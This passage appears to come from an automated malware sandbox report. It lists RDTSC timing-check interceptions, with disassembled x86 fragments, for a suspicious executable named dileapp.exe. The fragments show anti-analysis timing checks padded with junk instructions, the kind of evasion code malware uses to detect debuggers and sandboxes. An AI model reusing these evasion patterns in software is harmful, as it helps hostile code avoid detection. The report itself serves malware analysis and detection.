                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12498ED second address: 12498F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12498F1 second address: 1249901 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FCCB0D02D06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1249901 second address: 1249905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1249905 second address: 1249909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1249909 second address: 124993C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jne 00007FCCB120DFD6h 0x00000011 jmp 00007FCCB120DFE6h 0x00000016 popad 0x00000017 push edx 0x00000018 jg 00007FCCB120DFD6h 0x0000001e pop edx 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 124807D second address: 124809A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jc 00007FCCB0D02D06h 0x0000000c jmp 00007FCCB0D02D0Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 124809A second address: 12480A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 124835C second address: 124837C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007FCCB0D02D16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248512 second address: 1248518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248518 second address: 124851D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 124851D second address: 1248527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FCCB120DFD6h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248527 second address: 1248543 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248543 second address: 1248547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248547 second address: 1248557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D0Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248557 second address: 124855D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 124855D second address: 1248563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248739 second address: 124873F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5B4F second address: 11E5BC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FCCB0D02D0Ah 0x0000000c pop ecx 0x0000000d popad 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+13763215h] 0x00000015 mov dword ptr [ebp+13761C71h], edi 0x0000001b mov ebx, dword ptr [ebp+1391FB4Ch] 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007FCCB0D02D08h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000019h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b mov di, C6D2h 0x0000003f add eax, ebx 0x00000041 mov edx, dword ptr [ebp+13762A90h] 0x00000047 nop 0x00000048 pushad 0x00000049 pushad 0x0000004a jmp 00007FCCB0D02D14h 0x0000004f pushad 0x00000050 popad 0x00000051 popad 0x00000052 push eax 0x00000053 push edx 0x00000054 push edi 0x00000055 pop edi 0x00000056 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5BC0 second address: 11E5BC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5BC4 second address: 11E5BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5BD2 second address: 11E5BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5BD6 second address: 11E5BDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5BDC second address: 11E5BE6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCCB120DFDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12489E3 second address: 12489E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248B76 second address: 1248B91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE5h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1251EF7 second address: 1251F06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FCCB0D02D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1251F06 second address: 1251F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFE0h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1251F21 second address: 1251F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D0Ah 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1251F2F second address: 1251F55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnc 00007FCCB120DFD6h 0x0000000f jmp 00007FCCB120DFE2h 0x00000014 push esi 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1250154 second address: 125015A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125057E second address: 125059C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE8h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125059C second address: 12505B9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCCB0D02D13h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12505B9 second address: 12505BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1250D8F second address: 1250D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1250D97 second address: 1250D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1251089 second address: 125108F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1254FC3 second address: 1254FDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFDFh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1254FDE second address: 1254FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1254FE2 second address: 1254FE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1254FE6 second address: 1255007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D11h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FCCB0D02D06h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1255007 second address: 125500B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125500B second address: 125501B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jbe 00007FCCB0D02D06h 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125501B second address: 125502A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125502A second address: 1255030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1255030 second address: 1255061 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FCCB120DFEDh 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12555F7 second address: 12555FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12555FD second address: 1255625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FCCB120DFD6h 0x0000000a popad 0x0000000b jmp 00007FCCB120DFE5h 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FCCB120DFD6h 0x00000018 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1255625 second address: 125562B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1255907 second address: 125591F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125A98D second address: 125A99B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCCB0D02D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125A99B second address: 125A99F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125A99F second address: 125A9AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125A9AD second address: 125A9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12623E1 second address: 12623FF instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB0D02D08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCCB0D02D0Fh 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1262E12 second address: 1262E1C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB120DFD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1262E1C second address: 1262E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12630C9 second address: 12630EF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCCB120DFD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007FCCB120DFE6h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1263220 second address: 1263224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1263224 second address: 126323D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FCCB120DFD6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f js 00007FCCB120DFD6h 0x00000015 popad 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 126323D second address: 1263279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 jo 00007FCCB0D02D0Ah 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 js 00007FCCB0D02D0Eh 0x00000017 pushad 0x00000018 jl 00007FCCB0D02D06h 0x0000001e jng 00007FCCB0D02D06h 0x00000024 jmp 00007FCCB0D02D0Bh 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F195D second address: 11F196F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FCCB0D02D08h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11FD54C second address: 11FD5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FCCB120DFDCh 0x0000000d nop 0x0000000e xor ebx, dword ptr [ebp+138F784Dh] 0x00000014 push 00000000h 0x00000016 jng 00007FCCB120DFD9h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007FCCB120DFD8h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 jmp 00007FCCB120DFE1h 0x0000003d push eax 0x0000003e pushad 0x0000003f push esi 0x00000040 ja 00007FCCB120DFD6h 0x00000046 pop esi 0x00000047 push eax 0x00000048 push edx 0x00000049 push ecx 0x0000004a pop ecx 0x0000004b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11ECADB second address: 11ECAE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FCCB120DFD6h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F0B19 second address: 11F0B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FCCB120DFD6h 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F7253 second address: 11F72E8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FCCB120DFD8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov ebx, ecx 0x00000027 push dword ptr fs:[00000000h] 0x0000002e mov edi, dword ptr [ebp+138EDD63h] 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b cmc 0x0000003c mov eax, dword ptr [ebp+13760BC5h] 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007FCCB120DFD8h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 0000001Dh 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c jmp 00007FCCB120DFE8h 0x00000061 push FFFFFFFFh 0x00000063 sub dword ptr [ebp+137636B9h], edx 0x00000069 push eax 0x0000006a pushad 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1225846 second address: 122585B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFDDh 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 122585B second address: 1225871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCCB0D02D0Eh 0x0000000d rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1226FCC second address: 1226FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCCB120DFD6h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FCCB120DFE3h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 122EAAC second address: 122EAD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D16h 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007FCCB0D02D06h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jnc 00007FCCB0D02D06h 0x0000001c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 122EAD9 second address: 122EAEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FCCB120DFE6h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 122EDAD second address: 122EDC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFDBh 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FCCB120DFD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11A1511 second address: 11A151B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCCB120DFD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11A151B second address: 11A1529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007FCCB0D02D06h 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E570F second address: 11E573D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jc 00007FCCB0D02D23h 0x00000013 push eax 0x00000014 push edx 0x00000015 jg 00007FCCB0D02D06h 0x0000001b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E58FA second address: 11E5953 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push esi 0x0000000d add dword ptr [ebp+13762E04h], esi 0x00000013 pop edx 0x00000014 mov dx, ax 0x00000017 push 00000004h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FCCB120DFD8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 pushad 0x00000034 add dword ptr [ebp+137636D8h], ebx 0x0000003a mov dx, 2C04h 0x0000003e popad 0x0000003f mov dword ptr [ebp+138EFB4Bh], esi 0x00000045 nop 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5957 second address: 11E5974 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5974 second address: 11E5999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCCB0D02D12h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FCCB0D02D08h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6016 second address: 11E6026 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCCB0D02D0Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6026 second address: 11E6073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 je 00007FCCB120DFE2h 0x0000000f jg 00007FCCB120DFDCh 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a push edx 0x0000001b jmp 00007FCCB120DFE0h 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FCCB120DFE9h 0x00000028 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6171 second address: 11E6183 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
